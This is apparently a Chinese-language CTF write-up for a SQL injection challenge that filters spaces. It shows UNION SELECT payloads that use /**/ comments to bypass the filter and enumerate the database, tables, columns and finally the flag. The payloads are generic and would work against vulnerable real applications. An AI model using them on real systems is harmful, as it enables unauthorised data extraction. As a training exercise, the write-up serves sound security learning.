原题
解题思路
题目说了要过滤空格,使用“/**/”可以实现空格注释。
依旧是两个回显:
-1/**/union/**/select/**/1,2
接下来就是常规操作,依次找到数据库名、表名、列名、flag:
数据库名 还是sqli:
-1/**/union/**/select/**/1,database()
找表名
-1/**/union/**/select/**/1,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema='sqli'/**/limit/**/1
找列名
-1/**/union/**/select/**/1,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema='sqli'/**/and/**/table_name='tqcfzxnkzb'/**/limit/**/1
找flag
-1/**/union/**/select/**/1,group_concat(tdswkltjba)/**/from/**/sqli.tqcfzxnkzb/**/limit/**/1